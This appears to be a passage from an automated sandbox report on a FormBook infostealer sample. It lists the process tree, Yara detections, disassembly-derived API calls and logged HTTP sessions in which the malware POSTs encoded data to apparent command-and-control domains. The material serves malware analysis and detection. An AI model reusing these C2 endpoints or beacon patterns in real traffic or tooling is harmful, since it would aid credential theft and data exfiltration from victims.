                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATcyo2gE9A3u5f95lKB/p//e6EcTjsY4uYsuByP+iy2/TAqz0eHTzmuTSF+xMOPEEY3ZSbIGANUc3COU47T11izd5vLmGyRCoAtqF5uQ5BjYEjKZZmu6CNxtysyb8S2MXVDW57eT65u/mGevbDxONqBmVQ5X1cvdPLtbAxN9Vh37ZI5g=
                                                            Jan 10, 2025 22:06:33.246718884 CET | 241 | IN | HTTP/1.1 200 OK
                                                            Content-Encoding: gzip
                                                            Content-Type: text/html; charset=UTF-8
                                                            Date: Fri, 10 Jan 2025 21:06:32 GMT
                                                            Server: nginx
                                                            Vary: Accept-Encoding
                                                            Content-Length: 44
                                                            Connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                            Data Ascii: KLIU(WHO-QHKM.g


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.11 | 49732 | 154.205.156.26 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:34.387556076 CET | 1840 | OUT | POST /ao44/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.jijievo.site
                                                            Origin: http://www.jijievo.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.jijievo.site/ao44/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:35.903554916 CET | 241 | IN | HTTP/1.1 200 OK
                                                            Content-Encoding: gzip
                                                            Content-Type: text/html; charset=UTF-8
                                                            Date: Fri, 10 Jan 2025 21:06:35 GMT
                                                            Server: nginx
                                                            Vary: Accept-Encoding
                                                            Content-Length: 44
                                                            Connection: close
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                            Data Ascii: KLIU(WHO-QHKM.g


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.11 | 49733 | 154.205.156.26 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:36.938612938 CET | 544 | OUT | GET /ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.jijievo.site
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:38.397444963 CET | 197 | IN | HTTP/1.1 200 OK
                                                            Content-Type: text/html; charset=UTF-8
                                                            Date: Fri, 10 Jan 2025 21:06:38 GMT
                                                            Server: nginx
                                                            Vary: Accept-Encoding
                                                            Content-Length: 24
                                                            Connection: close
                                                            Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                            Data Ascii: Unable to get connection


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.11 | 49734 | 3.33.130.190 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:43.511842012 CET | 831 | OUT | POST /nqht/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.likesharecomment.net
                                                            Origin: http://www.likesharecomment.net
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.likesharecomment.net/nqht/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=64TukoECUmIA/bRD4N/6Zb+B392+ALmxgXFGsw556vnHYvIo7rt4QSXdgQibPQEuNaRouV+6ljGTypYjLW2aGRQpgP7JRWxAsjkdzR/NhXvEeuzy2lpskPoxSFUEmMnj5US1CzVnli99jhL69l3Vkk/BxGEPOO8x8EZm0LMn4hv80KAWtsTh2gKCPiIJSoprGQ==
                                                            Jan 10, 2025 22:06:43.968492985 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            18 | 192.168.2.11 | 49735 | 3.33.130.190 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:46.426377058 CET | 851 | OUT | POST /nqht/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.likesharecomment.net
                                                            Origin: http://www.likesharecomment.net
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.likesharecomment.net/nqht/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=64TukoECUmIA87hD0OH6Rb+ArN2+bbm1gXZGsxM+6cDHZLMo6qt4XSXd4giUCwExNaMXuQG6ljCTytIjLFeZHBQrov7HVWxAsjkdzQamhTDEe+jy2EpjsvoyRFUEiMn/5USDC2MMlg19jh766wbWuk/b/mEZDPVF3lMV/7Ux2wje8sNM9Pa21zCAbEp5bZMidcmPf4PxMKhn1jUBQ5ejjL8=
                                                            Jan 10, 2025 22:06:46.874176979 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Target ID:0
                                                            Start time:16:03:37
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\0Wu31IhwGO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\0Wu31IhwGO.exe"
                                                            Imagebase:0x7c0000
                                                            File size:886'272 bytes
                                                            MD5 hash:92AF2B53955341AF234B93FF7A4DE5C6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:16:04:03
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\0Wu31IhwGO.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\0Wu31IhwGO.exe"
                                                            Imagebase:0x840000
                                                            File size:886'272 bytes
                                                            MD5 hash:92AF2B53955341AF234B93FF7A4DE5C6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:16:04:59
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe"
                                                            Imagebase:0x8f0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:16:05:02
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\tzutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                            Imagebase:0x680000
                                                            File size:48'640 bytes
                                                            MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:16:05:15
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe"
                                                            Imagebase:0x8f0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:16:05:27
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff6de060000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:80
                                                              Total number of Limit Nodes:6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teeq$Teeq$z^I
                                                              • API String ID: 0-3834019116
                                                              • Opcode ID: 9aec49664320de091ee962ee2edd421b54d9a517f118e75ffe6afd59ff22de34
                                                              • Instruction ID: f24dfec4a40fd33e04359b77940bfc2dc18c45c45dd63cbada9b6a991ae80d69
                                                              • Opcode Fuzzy Hash: 9aec49664320de091ee962ee2edd421b54d9a517f118e75ffe6afd59ff22de34
                                                              • Instruction Fuzzy Hash: 8AB168B5E002598FEB14CFE9D9809DEFBB2BF89310F24912AD419BB254D7349941CF94

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teeq$Teeq$z^I
                                                              • API String ID: 0-3834019116
                                                              • Opcode ID: c70323fb3df670ad53af9b9cc31d38f7e5fcc7d0e9333b2eacfe73ddb6bd10e2
                                                              • Instruction ID: 7d0249716a4c25cf90260c234e08b7b1e3907e81cba135bf08ee1c85f36822ef
                                                              • Opcode Fuzzy Hash: c70323fb3df670ad53af9b9cc31d38f7e5fcc7d0e9333b2eacfe73ddb6bd10e2
                                                              • Instruction Fuzzy Hash: 1291F4B4E102198FDB08CFEAC98559EFBB6FF89300F24952AD419BB264D735A901CF54

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teeq$Teeq$z^I
                                                              • API String ID: 0-3834019116
                                                              • Opcode ID: 3776cd6d091dee022ba00e7aae15579efa066147acbd45c5a0aef1fc125215cb
                                                              • Instruction ID: 9b6ccc1ade8d7117d7a06d8f3109f1896fef120fa51d15697a7054dd83caaaf4
                                                              • Opcode Fuzzy Hash: 3776cd6d091dee022ba00e7aae15579efa066147acbd45c5a0aef1fc125215cb
                                                              • Instruction Fuzzy Hash: 7691F4B4E102198FDB08CFEAC58559EFBB6FF89300F24912AD419BB264D735A901CF54

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 963e961b760ddf099faeef7b1a8cae6fb8f33643d2e5f59d7e73c48a20bc5f85
                                                              • Instruction ID: d58a3877037def955b8e4432f4ef356eb3915633553a6687f04944838e3ef0a5
                                                              • Opcode Fuzzy Hash: 963e961b760ddf099faeef7b1a8cae6fb8f33643d2e5f59d7e73c48a20bc5f85
                                                              • Instruction Fuzzy Hash: 38E1AEB1D1461ADFDB14CFA5D4928EEFBB6FF49310B14C566D409AB215C338AA82CF90

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 1d661a9326bd3a35f6a496c06c06d4c11f25c41958e18d502a28f08c9659b0c4
                                                              • Instruction ID: 0a216c7ad0d54eb3badff40a7801593cefea947d92aade8b5bcb65c91ee87f0b
                                                              • Opcode Fuzzy Hash: 1d661a9326bd3a35f6a496c06c06d4c11f25c41958e18d502a28f08c9659b0c4
                                                              • Instruction Fuzzy Hash: DFE1AEB1D1461ADFDB14CFA5D4928EEFBB6FF49310B148566D409AB215C338AA82CF90

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 03d366e892b64aad87df1f6c232dda9a6a974aa91660044b650ad7f0366531be
                                                              • Instruction ID: 2ce9f72b23e22dee879387dbf916bec9d584ed409417893a5b9a7c7aaa9233c5
                                                              • Opcode Fuzzy Hash: 03d366e892b64aad87df1f6c232dda9a6a974aa91660044b650ad7f0366531be
                                                              • Instruction Fuzzy Hash: 0AE17AB0D1461ADFDB14CFA5D4928EEFBB6FF49310F148566D409AB215C338AA82CF90

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 83fc443fa7b3e290b08adb1b16ba40e4cb87162b2072b82de0fec90f7819cd7e
                                                              • Instruction ID: 7be40a72b94a39fb3b6438c368257aaea478c8160b06ef83fbbb5ff0d34eff30
                                                              • Opcode Fuzzy Hash: 83fc443fa7b3e290b08adb1b16ba40e4cb87162b2072b82de0fec90f7819cd7e
                                                              • Instruction Fuzzy Hash: 0CC139B0D1461ADFDB14CFA5C4A68AEFBB6FF89300F14C559D509AB214C738AA42CF94

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TuA$UC;"
                                                              • API String ID: 0-2071649361
                                                              • Opcode ID: fe6570ec40fb3f7e73fe66603475dd7056558f42dfc09da518f0bb714b2ca798
                                                              • Instruction ID: c7f93aaf893c7350ea5a140403d2493a436e54eadfac91aadeedb9f56be14187
                                                              • Opcode Fuzzy Hash: fe6570ec40fb3f7e73fe66603475dd7056558f42dfc09da518f0bb714b2ca798
                                                              • Instruction Fuzzy Hash: 2B9115B1E2420DEFDB18CFE6E58559EFBB6EF89310F10942AE419A7264DB349542CF04

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TuA$UC;"
                                                              • API String ID: 0-2071649361
                                                              • Opcode ID: 0dd4c6e1a415629d76cbc1386310e05ad2e15e7043ed4b318e8941e47a9b9f9a
                                                              • Instruction ID: 60ce5627c7500be77837e71e124545c5e83c0d090cf14895023f5e6becb65fcf
                                                              • Opcode Fuzzy Hash: 0dd4c6e1a415629d76cbc1386310e05ad2e15e7043ed4b318e8941e47a9b9f9a
                                                              • Instruction Fuzzy Hash: 1C9115B1E2420DEFDB18CFA6E58559EFBB6EF89310F10942AE419A7264D7349942CF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5=6
                                                              • API String ID: 0-2897083178
                                                              • Opcode ID: 2af09a683b995a5eb53edb3e9da3390b9a97a9418e1cc0c53ae28d0140c6dbca
                                                              • Instruction ID: 7aea64870be50346dd3c8ff46b4399f4ce43f06b508a7d1ed470a8aeec2ed1bb
                                                              • Opcode Fuzzy Hash: 2af09a683b995a5eb53edb3e9da3390b9a97a9418e1cc0c53ae28d0140c6dbca
                                                              • Instruction Fuzzy Hash: E27159B4E1520ADFDB04CFA5D9424AEFBB6FF89201F10D46AD019E7294DB389A01CF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 ead1c8-ead267 GetCurrentProcess 298 ead269-ead26f 294->298 299 ead270-ead2a4 GetCurrentThread 294->299 298->299 300 ead2ad-ead2e1 GetCurrentProcess 299->300 301 ead2a6-ead2ac 299->301 303 ead2ea-ead305 call ead3a8 300->303 304 ead2e3-ead2e9 300->304 301->300 306 ead30b-ead33a GetCurrentThreadId 303->306 304->303 308 ead33c-ead342 306->308 309 ead343-ead3a5 306->309 308->309
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD256
                                                              • GetCurrentThread.KERNEL32 ref: 00EAD293
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD2D0
                                                              • GetCurrentThreadId.KERNEL32 ref: 00EAD329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 316 ead1d8-ead267 GetCurrentProcess 320 ead269-ead26f 316->320 321 ead270-ead2a4 GetCurrentThread 316->321 320->321 322 ead2ad-ead2e1 GetCurrentProcess 321->322 323 ead2a6-ead2ac 321->323 325 ead2ea-ead305 call ead3a8 322->325 326 ead2e3-ead2e9 322->326 323->322 328 ead30b-ead33a GetCurrentThreadId 325->328 326->325 330 ead33c-ead342 328->330 331 ead343-ead3a5 328->331 330->331
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD256
                                                              • GetCurrentThread.KERNEL32 ref: 00EAD293
                                                              • GetCurrentProcess.KERNEL32 ref: 00EAD2D0
                                                              • GetCurrentThreadId.KERNEL32 ref: 00EAD329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 883 eab209-eab237 884 eab239-eab246 call ea9d9c 883->884 885 eab263-eab267 883->885 890 eab248 884->890 891 eab25c 884->891 887 eab27b-eab2bc 885->887 888 eab269-eab273 885->888 894 eab2c9-eab2d7 887->894 895 eab2be-eab2c6 887->895 888->887 938 eab24e call eab4c0 890->938 939 eab24e call eab4b0 890->939 891->885 896 eab2fb-eab2fd 894->896 897 eab2d9-eab2de 894->897 895->894 902 eab300-eab307 896->902 899 eab2e9 897->899 900 eab2e0-eab2e7 call ea9da8 897->900 898 eab254-eab256 898->891 901 eab398-eab458 898->901 904 eab2eb-eab2f9 899->904 900->904 933 eab45a-eab45d 901->933 934 eab460-eab48b GetModuleHandleW 901->934 905 eab309-eab311 902->905 906 eab314-eab31b 902->906 904->902 905->906 908 eab328-eab331 call ea9db8 906->908 909 eab31d-eab325 906->909 914 eab33e-eab343 908->914 915 eab333-eab33b 908->915 909->908 916 eab361-eab36e 914->916 917 eab345-eab34c 914->917 915->914 924 eab370-eab38e 916->924 925 eab391-eab397 916->925 917->916 919 eab34e-eab35e call ea9dc8 call eaae14 917->919 919->916 924->925 933->934 935 eab48d-eab493 934->935 936 eab494-eab4a8 934->936 935->936 938->898 939->898
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00EAB47E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 940 ea449c-ea59b9 CreateActCtxA 943 ea59bb-ea59c1 940->943 944 ea59c2-ea5a1c 940->944 943->944 951 ea5a2b-ea5a2f 944->951 952 ea5a1e-ea5a21 944->952 953 ea5a40 951->953 954 ea5a31-ea5a3d 951->954 952->951 956 ea5a41 953->956 954->953 956->956
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00EA59A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00EA59A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EAD8AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EAD8AF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0737B4E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0737B4E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
